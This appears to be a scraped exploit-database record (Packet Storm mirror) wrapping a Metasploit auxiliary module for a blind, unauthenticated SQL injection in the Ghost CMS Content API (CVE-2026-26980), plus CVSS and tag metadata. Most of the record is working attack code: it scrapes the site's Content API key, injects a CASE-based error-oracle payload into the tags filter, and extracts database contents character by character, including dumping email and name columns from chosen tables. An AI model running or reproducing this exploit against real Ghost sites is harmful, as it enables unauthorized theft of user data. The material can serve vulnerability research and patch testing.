{“lastseen”:”2026-04-23T16:46:53″,”description”:”This is a Metasploit auxiliary module targeting a blind, unauthenticated SQL injection vulnerability in the Ghost CMS Content API that affects versions 3.24.0 through 6.19.0…”,”published”:”2026-04-23T00:00:00″,”modified”:”2026-04-23T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Ghost CMS 6.19.0 SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:219677″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-26980″],”sourceData”:”==================================================================================================================================\\n | # Title : Ghost CMS 6.19.0 Unauthenticated Content API Blind SQL Injection |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.4 (64 bits) |\\n | # Vendor : https:\/\/ghost.org\/ |\\n ==================================================================================================================================\\n \\n [+] Summary : This is a Metasploit auxiliary module targeting a blind, unauthenticated SQL injection vulnerability in the Ghost CMS Content API (versions 3.24.0 to 6.19.0).\\n \\n \\n [+] POC : \\n \\n ##\\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n ##\\n \\n class MetasploitModule \\u003c Msf::Auxiliary\\n include Msf::Auxiliary::Report\\n include Msf::Exploit::Remote::HttpClient\\n include Msf::Auxiliary::Scanner\\n \\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Ghost CMS Unauthenticated SQL Injection via Content API’,\\n ‘Description’ =\\u003e %q{\\n Ghost CMS versions 3.24.0 through 6.19.0 contain an unauthenticated SQL injection\\n vulnerability in the Content API.\\n },\\n ‘Author’ =\\u003e [\\n ‘indoushka’\\n ],\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2026-26980’]\\n ],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘DisclosureDate’ =\\u003e ‘2026-03-30’\\n )\\n )\\n \\n register_options([\\n OptString.new(‘TARGETURI’, [true, ‘Base path for Ghost installation’, ‘\/’]),\\n OptString.new(‘API_KEY’, [false, ‘Ghost Content API Key’, ”]),\\n OptString.new(‘API_PATH’, [false, ‘Content API path’, ”]),\\n OptEnum.new(‘DBMS’, [true, ‘Database engine’, ‘sqlite’, [‘sqlite’, ‘mysql’]]),\\n OptString.new(‘TABLE’, [false, ‘Specific table’, ”]),\\n OptString.new(‘COLUMNS’, [false, ‘Columns’, ”]),\\n OptInt.new(‘THREADS’, [true, ‘Threads’, 15]),\\n OptInt.new(‘TIMEOUT’, [true, ‘Timeout’, 10])\\n ])\\n end\\n \\n def setup\\n @base_uri = normalize_uri(target_uri.path)\\n @api_key = datastore[‘API_KEY’]\\n @api_path = datastore[‘API_PATH’]\\n @dbms = datastore[‘DBMS’]\\n @threads = datastore[‘THREADS’]\\n @timeout = datastore[‘TIMEOUT’]\\n @table_to_dump = datastore[‘TABLE’]\\n @columns = datastore[‘COLUMNS’]\\u0026.split(‘,’)\\u0026.map(\\u0026:strip)\\n \\n @charset = \\”$.\/0123456789:ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz@!#%^\\u0026*()+-=\\”.chars\\n @error_indicator = \\”InternalServerError\\”\\n @api_endpoint = nil\\n @tag_slug = nil\\n @tag_id = nil\\n @url_template = nil\\n end\\n \\n def run_host(ip)\\n print_status(\\”Ghost SQLi CVE-2026-26980\\”)\\n print_status(\\”Target: #{peer}\\”)\\n \\n unless discover_api_endpoint\\n print_error(\\”Discovery failed\\”)\\n return\\n end\\n \\n unless verify_oracle\\n print_error(\\”Oracle failed\\”)\\n return\\n end\\n \\n if @table_to_dump \\u0026\\u0026 !@table_to_dump.empty?\\n dump_table(@table_to_dump)\\n else\\n perform_reconnaissance\\n end\\n end\\n \\n def discover_api_endpoint\\n res = send_request_cgi({\\n ‘uri’ =\\u003e normalize_uri(@base_uri),\\n ‘method’ =\\u003e ‘GET’\\n })\\n \\n return false unless res \\u0026\\u0026 res.code == 200\\n \\n if res.body =~ \/data-key=\\”([a-f0-9]+)\\”\/\\n @api_key = Regexp.last_match(1)\\n else\\n return false\\n end\\n \\n if res.body =~ \/data-api=\\”([^\\”]+)\\”\/\\n api_raw = Regexp.last_match(1)\\n path = URI.parse(api_raw).path\\n @api_endpoint = normalize_uri(@base_uri, path)\\n @api_endpoint = \\”#{@api_endpoint}\/\\”\\n else\\n return false\\n end\\n \\n discover_tag_from_api\\n end\\n \\n def discover_tag_from_api\\n res = send_request_cgi({\\n ‘uri’ =\\u003e normalize_uri(@api_endpoint, ‘tags\/’),\\n ‘method’ =\\u003e ‘GET’,\\n ‘vars_get’ =\\u003e { ‘key’ =\\u003e @api_key }\\n })\\n \\n return false unless res \\u0026\\u0026 res.code == 200\\n \\n json = JSON.parse(res.body)\\n return false unless json[‘tags’] \\u0026\\u0026 json[‘tags’][0]\\n \\n @tag_slug = json[‘tags’][0][‘slug’]\\n @tag_id = json[‘tags’][0][‘id’]\\n \\n slug = Rex::Text.uri_encode(@tag_slug.to_s)\\n @url_template = \\”#{@api_endpoint}tags\/?key=#{@api_key}\\u0026filter=slug:[‘*’,#{slug}]\\u0026limit=all\\”\\n \\n true\\n rescue\\n false\\n end\\n \\n def verify_oracle\\n check_condition(\\”1=1\\”) \\u0026\\u0026 !check_condition(\\”1=2\\”)\\n end\\n \\n def check_condition(condition)\\n if @dbms == \\”mysql\\”\\n error_payload = \\”(SELECT exp(710))\\”\\n else\\n error_payload = \\”(SELECT abs(-9223372036854775808))\\”\\n end\\n \\n payload = \\” OR CASE WHEN (#{condition}) THEN #{error_payload} ELSE 0 END AND slug=\\”\\n url = @url_template.gsub(\\”*\\”, payload, 1)\\n \\n res = send_request_cgi({\\n ‘uri’ =\\u003e url,\\n ‘method’ =\\u003e ‘GET’,\\n ‘timeout’ =\\u003e @timeout\\n })\\n \\n return false unless res \\u0026\\u0026 res.body\\n \\n res.body =~ \/badrequesterror\/i || res.body =~ \/#{@error_indicator}\/i\\n rescue\\n false\\n end\\n \\n def get_query_length(query)\\n length = 0\\n [64, 32, 16, 8, 4, 2, 1].each do |bit|\\n if check_condition(\\”LENGTH((#{query}))\\u003e=#{length + bit}\\”)\\n length += bit\\n end\\n end\\n length\\n end\\n \\n def get_query_char(query, position)\\n low = 0\\n high = @charset.length – 1\\n \\n while low \\u003c high\\n mid = (low + high) \/ 2\\n char_code = @charset[mid].ord\\n \\n condition = \\”ASCII(SUBSTR((#{query}),#{position},1))\\u003e=#{char_code}\\”\\n \\n if check_condition(condition)\\n low = mid + 1\\n else\\n high = mid\\n end\\n end\\n \\n @charset[low]\\n end\\n \\n def extract_data(query, label, force_length = nil)\\n length = force_length || get_query_length(query)\\n return \\”\\” if length.nil? || length.to_i \\u003c= 0\\n \\n result = []\\n (1..length).each do |pos|\\n result \\u003c\\u003c get_query_char(query, pos)\\n end\\n \\n result.join\\n end\\n \\n def dump_table(table_name)\\n print_status(\\”Dumping: #{table_name}\\”)\\n \\n count = get_query_length(\\”SELECT COUNT(*) FROM #{table_name}\\”)\\n return if count \\u003c= 0\\n \\n (0…count).each do |i|\\n row = {}\\n [‘id’, ’email’, ‘name’].each do |col|\\n row[col] = extract_data(\\”SELECT #{col} FROM #{table_name} LIMIT 1 OFFSET #{i}\\”, col)\\n end\\n end\\n end\\n end\\n \\t\\n Greetings to :==============================================================================\\n jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n ============================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/219677″,”cvss”:{“score”:9.4,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:L”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/219677\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-23T16:46:53″,”description”:”This is a Metasploit auxiliary module targeting a blind, unauthenticated SQL injection vulnerability in the Ghost CMS Content API that affects versions 3.24.0 through 6.19.0…”,”published”:”2026-04-23T00:00:00″,”modified”:”2026-04-23T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,131,12,13,53,7,11,5],"class_list":["post-48970","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-94","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n